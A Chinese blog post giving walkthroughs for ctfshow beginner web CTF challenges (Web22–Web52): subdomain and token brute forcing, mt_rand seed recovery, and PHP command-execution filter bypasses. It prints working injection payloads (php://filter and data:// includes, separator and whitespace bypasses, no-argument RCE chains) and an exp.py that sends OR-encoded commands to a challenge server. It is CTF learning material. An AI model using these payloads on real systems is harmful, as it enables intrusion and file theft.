<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>ctfshow-web入门</title>

    <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/post.css">
    
        <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/normal.css">
    

    <script type="text/javascript" src="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/jquery-3.4.1.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"></head>
<body>
    <a id="cover"></a>
    <div id="header">
    <div class="header">
        <div class="vertical">
            <div class="inner">
                <h1 class="header-subtitle">ctfshow-web入门</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2021-04-23
                        </span>
                        
                            <span id="/2021/04/23/ctfshow-web入门/" class="leancloud_visitors" data-flag-title="ctfshow-web入门">
                                <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                            </span>
                        
                        <span>
                            <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/2021/04/23/ctfshow-web入门/"></span>
                        </span>  
                    </p>                 
                </div>
            </div>
        </div>
        <canvas id="articleHeaderCanvas"></canvas>
    </div>
</div>
    <div id="container">
    <div id="content">
        <div id="article">
    <div class="toc"></div>
    <div class="article-body">
        <h1 id="爆破"><a href="#爆破" class="headerlink" title="爆破"></a>爆破</h1><h2 id="Web22"><a href="#Web22" class="headerlink" title="Web22"></a>Web22</h2><p>子域名爆破<br>这是一个在线工具<br><a target="_blank" rel="noopener" href="https://phpinfo.me/domain">https://phpinfo.me/domain</a><br>然后你就能看到几个网址，其中一个vip的，打开之后发现不了什么异常，你把鼠标悬停在某处就知道了。<br><img src="/image/web%E5%85%A5%E9%97%A81.png"></p>
<h2 id="Web23"><a href="#Web23" class="headerlink" title="Web23"></a>Web23</h2><p>根据题目改写代码，得到token</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">error_reporting(0); </span><br><span class="line"> </span><br><span class="line">$a&#x3D;&quot;asdfghjklqwertyuiopzxcvbnm1234567890&quot;;</span><br><span class="line">for($i&#x3D;0;$i&lt;36;$i++)&#123;</span><br><span class="line">    for($j&#x3D;0;$j&lt;36;$j++)&#123;</span><br><span class="line">        $token&#x3D;$a[$i].$a[$j];    </span><br><span class="line">        $token &#x3D; md5($token); </span><br><span class="line">        if(substr($token, 1,1)&#x3D;&#x3D;&#x3D;substr($token, 14,1) &amp;&amp; substr($token, 14,1) &#x3D;&#x3D;&#x3D;substr($token, 17,1))&#123; </span><br><span class="line">            if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))&#x2F;substr($token, 1,1)&#x3D;&#x3D;&#x3D;intval(substr($token, 31,1)))&#123; </span><br><span class="line">                echo $a[$i].$a[$j];</span><br><span class="line">                exit(0);</span><br><span class="line">            &#125; </span><br><span class="line">        &#125; </span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>
<p>运行结果<br>3j<br><a target="_blank" rel="noopener" href="http://471c7728-847a-4242-bfde-37c623e9df49.challenge.ctf.show:8080/?Token=3j">http://471c7728-847a-4242-bfde-37c623e9df49.challenge.ctf.show:8080/?Token=3j</a></p>
<h2 id="Web24"><a href="#Web24" class="headerlink" title="Web24"></a>Web24</h2><p>就是要得到r</p>
<p>同一个种子，生成随机数的序列一样，伪随机数产生的值都一样</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">mt_srand(372619038);</span><br><span class="line">$result &#x3D; intval(mt_rand());</span><br><span class="line">echo $result;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>php版本不一样的话，得到的结果不一样，最后要7的才可以得到flag<br><a target="_blank" rel="noopener" href="http://471c7728-847a-4242-bfde-37c623e9df49.challenge.ctf.show:8080/?r=2315351346(r%E4%B9%B1%E5%86%99%E7%9A%84%EF%BC%8C%E8%87%AA%E5%B7%B1%E6%B1%82)">http://471c7728-847a-4242-bfde-37c623e9df49.challenge.ctf.show:8080/?r=2315351346(r乱写的，自己求)</a></p>
<h2 id="Web25"><a href="#Web25" class="headerlink" title="Web25"></a>Web25</h2><p>这是题目<br><img src="/image/web%E5%85%A5%E9%97%A82.png"><br>这题没有明确的给出种子，种子需要我们来爆破，可以使用工具<br>下面是工具的使用方法，下载好需要先编译一下<br><img src="/image/web%E5%85%A5%E9%97%A83.png"><br><img src="/image/web%E5%85%A5%E9%97%A84.png"><br>根据版本选择种子，咱们就选最后一个3789269817<br>对了，上面那条指令中的1304745988怎么来的呢<br><img src="/image/web%E5%85%A5%E9%97%A85.png"><br>这么来的<br>看题目代码，得到一个r，然后有一个不知道种子的随机数，我们让r=0，那就能得到<br>rand = -mt_rand()，然后就得到了一个随机数，我们就用这个随机数去用上面的工具爆破得到种子，然后算出cookie(token)，然后加入进去，就如下面这张图，完了就刷新以下</p>
<p>结果发现，还是没看到想要的东西，那是因为条件没完全满足，还要加上r的那个值,让rand=0</p>
<p>然后就出来了<br><img src="/image/web%E5%85%A5%E9%97%A86.png"><br><img src="/image/web%E5%85%A5%E9%97%A87.png"><br>本来还没整明白怎么回事，写完题解就大彻大悟了，所以还是建议大家多写WP，好的，下一题</p>
<h2 id="Web26"><a href="#Web26" class="headerlink" title="Web26"></a>Web26</h2><p>打开网址一看我还以为自己干什么坏事了，被警告呢<br><img src="/image/web%E5%85%A5%E9%97%A87.png"><br><img src="/image/web%E5%85%A5%E9%97%A88.png"><br>查看源码，可以看到有一个，checkdb.php的文件，就用下面的方法<br><img src="/image/web%E5%85%A5%E9%97%A89.png"><br><img src="/image/web%E5%85%A5%E9%97%A810.png"><br><img src="/image/web%E5%85%A5%E9%97%A811.png"></p>
<h2 id="Web27"><a href="#Web27" class="headerlink" title="Web27"></a>Web27</h2><p>打开是这样的<br><img src="/image/web%E5%85%A5%E9%97%A812.png"><br>那就下载个录取名单看看，然后查询系统也看看<br>结合一下发现，身份证没有出生日期，那我们就来爆破<br>查询系统里面抓个包看看，最牛皮的是火狐竟然抓包抓不到那两个参数，所以只能用谷歌试一试了，但是我就想去个谷歌安装一个换代理的插件，得嘞，下面咱们就先安装插件，不想看的小伙伴直接跳过吧<br>插件名字叫做<br>__ proxy switchyomega __<br>自己去往上找，下载的是crx文件，咱们下载好之后就先把后缀名改成zip，然后解压，然后到谷歌的拓展程序打开开发者选项，然后加进去就好了，至于怎么用自己搜</p>
<p><img src="/image/web%E5%85%A5%E9%97%A813.png"><br>嘿嘿，抓到了<br><img src="/image/web%E5%85%A5%E9%97%A814.png"><br><img src="/image/web%E5%85%A5%E9%97%A815.png"><br><img src="/image/web%E5%85%A5%E9%97%A816.png"><br><img src="/image/web%E5%85%A5%E9%97%A817.png"></p>
<p>这是unicode，去网上找一些在线解码的，就能得到一些信息，然后就解决了</p>
<h2 id="Web28"><a href="#Web28" class="headerlink" title="Web28"></a>Web28</h2><p><img src="/image/web%E5%85%A5%E9%97%A818.png"><br><img src="/image/web%E5%85%A5%E9%97%A819.png"><br><img src="/image/web%E5%85%A5%E9%97%A820.png"></p>
<h1 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h1><h2 id="Web29"><a href="#Web29" class="headerlink" title="Web29"></a>Web29</h2><p><img src="/image/web%E5%85%A5%E9%97%A821.png"><br>看到这样，本来想用蚁剑，但是吧，连不上<br>就这样了<br><img src="/image/web%E5%85%A5%E9%97%A822.png"></p>
<h2 id="Web30"><a href="#Web30" class="headerlink" title="Web30"></a>Web30</h2><p><img src="/image/web%E5%85%A5%E9%97%A823.png"><br>听说这叫套娃</p>
<h2 id="Web31"><a href="#Web31" class="headerlink" title="Web31"></a>Web31</h2><p><img src="/image/web%E5%85%A5%E9%97%A824.png"><br>反引号和echo也给过滤了，不过还可以利用include函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?c&#x3D;include$_POST[a]?&gt;</span><br><span class="line">POST:a&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</span><br></pre></td></tr></table></figure>
<p>目前还不知道原理<br><img src="/image/web%E5%85%A5%E9%97%A825.png"></p>
<h2 id="Web32"><a href="#Web32" class="headerlink" title="Web32"></a>Web32</h2><p>和上一题一样</p>
<h2 id="Web33"><a href="#Web33" class="headerlink" title="Web33"></a>Web33</h2><p><img src="/image/web%E5%85%A5%E9%97%A826.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;?c&#x3D;include$_POST[a]?&gt;</span><br><span class="line">a&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</span><br></pre></td></tr></table></figure>
<p>和上一题一样</p>
<h2 id="Web34"><a href="#Web34" class="headerlink" title="Web34"></a>Web34</h2><p><img src="/image/web27.png"><br>和上一题一样</p>
<h2 id="Web35"><a href="#Web35" class="headerlink" title="Web35"></a>Web35</h2><p>同上</p>
<h2 id="Web36"><a href="#Web36" class="headerlink" title="Web36"></a>Web36</h2><p>同上</p>
<h2 id="Web37"><a href="#Web37" class="headerlink" title="Web37"></a>Web37</h2><p><img src="/image/web%E5%85%A5%E9%97%A828.png"><br>这次使用了,include语句，这里过滤了flag，我们采用伪协议data的方法进行绕过<br><img src="/image/web%E5%85%A5%E9%97%A829.png"><br>好像还是过滤了，cat</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c&#x3D;data:&#x2F;text&#x2F;plain,&lt;?php system(&quot;tac fla*&quot;);?&gt;</span><br></pre></td></tr></table></figure>
<h2 id="Web38"><a href="#Web38" class="headerlink" title="Web38"></a>Web38</h2><p><img src="/image/web%E5%85%A5%E9%97%A830.png"><br>和上一题的区别就是多过滤了两个<br><img src="/image/web%E5%85%A5%E9%97%A831.png"><br>?c=data:/text/plain,<?= system("tac fla*");?></p>
<h2 id="Web39"><a href="#Web39" class="headerlink" title="Web39"></a>Web39</h2><p>怎么感觉和37一样</p>
<h2 id="Web40"><a href="#Web40" class="headerlink" title="Web40"></a>Web40</h2><p><img src="/image/web%E5%85%A5%E9%97%A832.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c&#x3D;show_source(next(array_reverse(scandir(pos(localeconv())))));</span><br></pre></td></tr></table></figure>

<p>其实这题不是特别懂，上面是看hint的</p>
<p>下面写一下别人的题解<br>这题又回到了，eval语句执行命令，但是过滤了很多东西，没有过滤掉括号，那就使用无参数的rce进行构造读取文件<br>print_r(scandir(‘,’));查看当前目录下的所有文件名<br>localeconv() 函数返回一包含本地数字及货币格式信息的数组<br>current() 函数返回数组中的当前元素（单元），默认取第一个值，pos是current的别名</p>
<p>?c=print_r(scandir(current(localeconv())));<br>这样可以打印出当前目录下的文件，其实我也不明白怎么回事<br>读取目录文件后，发现输出的是数组，而文件名是数组中的值，下一步我们需要取出想要读取文件的数组。</p>
<p>each()返回数组中当前的键/值对并将数组指针向前移一步<br>end()将数组的内部指针指向最后一个单元<br>next()将数组的内部指针向前移动一位<br>prev()将数组中的内部指针倒回一位<br>array_reverse()以相反的元素顺序返回数组</p>
<p>然后就构造出来了<br>?c=show_source(next(array_reverse(scandir(getcwd()))));</p>
<h2 id="Web41"><a href="#Web41" class="headerlink" title="Web41"></a>Web41</h2><p><img src="/image/web%E5%85%A5%E9%97%A833.png"><br>还没整明白<br>之前确实一直没整明白怎么回事，今天总算搞明白了一点<br>下面的题解是参考了羽师傅的</p>
<p>这题过滤了，$+-^~ 使得异或自增和取反构造字符串都无法使用（其实就算可以，我也不太会用），同时还过滤了字母和数字。而且题目像是特意留了个或运算符|。<br>我们可以从ascii为0-225的字符中，找到或运算能得到我们可用的字符。<br>这里从羽师父那里搞来的两个脚本</p>
<p>第一个是用来生成可用字符的集合</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">rce_or.php</span><br><span class="line">&lt;?php</span><br><span class="line">$myfile &#x3D; fopen(&quot;rce_or.txt&quot;, &quot;w&quot;);</span><br><span class="line">$contents&#x3D;&quot;&quot;;</span><br><span class="line">for ($i&#x3D;0; $i &lt; 256; $i++) &#123; </span><br><span class="line">	for ($j&#x3D;0; $j &lt;256 ; $j++) &#123; </span><br><span class="line"></span><br><span class="line">		if($i&lt;16)&#123;</span><br><span class="line">			$hex_i&#x3D;&#39;0&#39;.dechex($i);</span><br><span class="line">		&#125;</span><br><span class="line">		else&#123;</span><br><span class="line">			$hex_i&#x3D;dechex($i);</span><br><span class="line">		&#125;</span><br><span class="line">		if($j&lt;16)&#123;</span><br><span class="line">			$hex_j&#x3D;&#39;0&#39;.dechex($j);</span><br><span class="line">		&#125;</span><br><span class="line">		else&#123;</span><br><span class="line">			$hex_j&#x3D;dechex($j);</span><br><span class="line">		&#125;</span><br><span class="line">		$preg &#x3D; &#39;&#x2F;[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\&#123;|\&#125;|\&amp;|\-&#x2F;i&#39;;</span><br><span class="line">		if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j)))&#123;</span><br><span class="line">					echo &quot;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">  </span><br><span class="line">		else&#123;</span><br><span class="line">		$a&#x3D;&#39;%&#39;.$hex_i;</span><br><span class="line">		$b&#x3D;&#39;%&#39;.$hex_j;</span><br><span class="line">		$c&#x3D;(urldecode($a)|urldecode($b));</span><br><span class="line">		if (ord($c)&gt;&#x3D;32&amp;ord($c)&lt;&#x3D;126) &#123;</span><br><span class="line">			$contents&#x3D;$contents.$c.&quot; &quot;.$a.&quot; &quot;.$b.&quot;\n&quot;;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">fwrite($myfile,$contents);</span><br><span class="line">fclose($myfile);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>上面这个代码大体上的意思就是，从进行异或的字符中排除掉被过滤的，然后再判断异或得到的字符是否为可见字符。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">第二个代码是exp.py</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line">import urllib</span><br><span class="line">from sys import *</span><br><span class="line">import os</span><br><span class="line"></span><br><span class="line">url&#x3D;&quot;http:&#x2F;&#x2F;04abe989-9b1c-4019-a8bd-76ceaa3a8c57.challenge.ctf.show:8080&#x2F;&quot;</span><br><span class="line">def action(arg):</span><br><span class="line">    s1 &#x3D; &quot;&quot;</span><br><span class="line">    s2 &#x3D; &quot;&quot;</span><br><span class="line">    for i in arg:</span><br><span class="line">        f &#x3D; open(&quot;rce_or.txt&quot;, &quot;r&quot;)</span><br><span class="line">        while True:</span><br><span class="line">            t &#x3D; f.readline()</span><br><span class="line">            if t &#x3D;&#x3D; &quot;&quot;:</span><br><span class="line">                break</span><br><span class="line">            if t[0] &#x3D;&#x3D; i:</span><br><span class="line">                # print(i)</span><br><span class="line">                s1 +&#x3D; t[2:5]</span><br><span class="line">                s2 +&#x3D; t[6:9]</span><br><span class="line">                break</span><br><span class="line">        f.close()</span><br><span class="line">    output &#x3D; &quot;(\&quot;&quot; + s1 + &quot;\&quot;|\&quot;&quot; + s2 + &quot;\&quot;)&quot;</span><br><span class="line">    return (output)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">while True:</span><br><span class="line">    param &#x3D; action(input(&quot;\n[+] your function：&quot;)) + action(input(&quot;[+] your command：&quot;))</span><br><span class="line">    data &#x3D; &#123;</span><br><span class="line">        &#39;c&#39;: urllib.parse.unquote(param)</span><br><span class="line">    &#125;</span><br><span class="line">    r &#x3D; requests.post(url, data&#x3D;data)</span><br><span class="line">    print(&quot;\n[*] result:\n&quot; + r.text)</span><br></pre></td></tr></table></figure>
<p><img src="/image/web%E5%85%A5%E9%97%A834.png"><br><img src="/image/web%E5%85%A5%E9%97%A835.png"></p>
<h2 id="Web42"><a href="#Web42" class="headerlink" title="Web42"></a>Web42</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">    $c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">    system($c.&quot; &gt;&#x2F;dev&#x2F;null 2&gt;&amp;1&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>System后面多了一个奇怪的东西，是什么意思呢<br>意思事写入的内容会永远消失，就是不进行回显</p>
<blockquote>
<p>/dev/null 2&gt;&amp;1</p>
</blockquote>
<ol>
<li><blockquote>
<p>代表重定向到哪里，例如:echo “123”&gt; /home/123.txt</p>
</blockquote>
</li>
<li>/dev/null代表空设备文件</li>
<li>2&gt;表示stderr标准错误</li>
<li>&amp;表示等同于的意思，2&gt;&amp;1，表示2的输出重定向等同于1</li>
<li>1表示stdout标准输出，系统默认值是1，所以”&gt;/dev/null”，因此，&gt;dev/null 2&gt;&amp;1 也可以写成“1&gt;dev/null 2&gt;&amp;1”</li>
</ol>
<p>那么本文标题的语句执行过程为：</p>
<ol>
<li><blockquote>
<p>/dev/null：首先表示标准输出重定向到空设备文件，也就是不输出任何信息到终端，也就是不显示任何信息。</p>
</blockquote>
</li>
<li><blockquote>
<p>&amp;1：接着，标准错误输出重定向到标准输出，因为之前标准输出已经重定向到了空设备文件，所以标准错误输出也重定向到空设备文件</p>
</blockquote>
</li>
</ol>
<p>用;号或者||等等一些命令分隔符进行命令分割，就可以了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c&#x3D;tac flag.php;</span><br></pre></td></tr></table></figure>
<h2 id="Web43"><a href="#Web43" class="headerlink" title="Web43"></a>Web43</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">	$c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">	if(!preg_match(&quot;&#x2F;\:|cat&#x2F;i&quot;,$c))&#123;</span><br><span class="line">		system($c.&quot; &gt;&#x2F;dev&#x2F;null 2&gt;&amp;1&quot;);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">	highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>对分号，cat都过滤了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c&#x3D;tac flag.php||</span><br></pre></td></tr></table></figure>
<h2 id="Web44"><a href="#Web44" class="headerlink" title="Web44"></a>Web44</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">	$c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">	if(!preg_match(&quot;&#x2F;\:|cat|flag&#x2F;i&quot;,$c))&#123;</span><br><span class="line">		system($c.&quot; &gt;&#x2F;dev&#x2F;null 2&gt;&amp;1&quot;);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">	highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>?c=tac fla*.php||</p>
<h2 id="Web45"><a href="#Web45" class="headerlink" title="Web45"></a>Web45</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">	$c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">	if(!preg_match(&quot;&#x2F;\:|cat|flag| &#x2F;i&quot;,$c))&#123;</span><br><span class="line">		system($c.&quot; &gt;&#x2F;dev&#x2F;null 2&gt;&amp;1&quot;);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">	highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>/?c=tac%09fla*.php||</p>
<h2 id="Web46"><a href="#Web46" class="headerlink" title="Web46"></a>Web46</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">    $c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">    if(!preg_match(&quot;&#x2F;\;|cat|flag| |[0-9]|\\$|\*&#x2F;i&quot;, $c))&#123;</span><br><span class="line">        system($c.&quot; &gt;&#x2F;dev&#x2F;null 2&gt;&amp;1&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#x2F;?c&#x3D;tac%09fla?.php||</span><br></pre></td></tr></table></figure>
<p>%09,它不属于数字范畴</p>
<h2 id="Web47"><a href="#Web47" class="headerlink" title="Web47"></a>Web47</h2><p>同上</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">    $c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">    if(!preg_match(&quot;&#x2F;\;|cat|flag| |[0-9]|\\$|more|less|head|sort|tail|\*&#x2F;i&quot;, $c))&#123;</span><br><span class="line">        system($c.&quot; &gt;&#x2F;dev&#x2F;null 2&gt;&amp;1&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#x2F;?c&#x3D;tac%09fla?.php||</span><br></pre></td></tr></table></figure>
<p><img src="/image/web%E5%85%A5%E9%97%A836.png"></p>
<h2 id="Web48-59"><a href="#Web48-59" class="headerlink" title="Web48-59"></a>Web48-59</h2><p>同上</p>
<h2 id="Web50"><a href="#Web50" class="headerlink" title="Web50"></a>Web50</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">    $c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">    if(!preg_match(&quot;&#x2F;\;|cat|flag| |[0-9]|\\$|more|less|head|sort|tail|\*|sed|cut|awk|string|od|curl|\&#39;|\%|\x09|\x26&#x2F;i&quot;, $c))&#123;</span><br><span class="line">        system($c.&quot; &gt;&#x2F;dev&#x2F;null 2&gt;&amp;1&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">*号过滤了，就用\分割</span><br></pre></td></tr></table></figure>

<p>?c=tac&lt;fla\g.php||</p>
<h2 id="Web51"><a href="#Web51" class="headerlink" title="Web51"></a>Web51</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">    $c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">    if(!preg_match(&quot;&#x2F;\;|cat|tac|flag| |[0-9]|\\$|more|less|head|sort|tail|\*|sed|cut|awk|string|od|curl|\&#39;|\%|\x09|\x26&#x2F;i&quot;, $c))&#123;</span><br><span class="line">        system($c.&quot; &gt;&#x2F;dev&#x2F;null 2&gt;&amp;1&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">*号过滤了，就用\分割</span><br></pre></td></tr></table></figure>
<p>?c=ta\c&lt;fla\g.php||</p>
<h2 id="Web52"><a href="#Web52" class="headerlink" title="Web52"></a>Web52</h2><p>终于开始有点不一样的了<br>?c=ls||<br>得到下面的结果</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag.php index.php</span><br></pre></td></tr></table></figure>
<p>那就去index.php里面看一下，发现唉<br><img src="/image/web%E5%85%A5%E9%97%A837.png"><br>然后目录一级一级看的去，终于看到flag了<br><img src="/image/web%E5%85%A5%E9%97%A838.png"><br>进去看一下<br><img src="/image/web%E5%85%A5%E9%97%A839.png"></p>
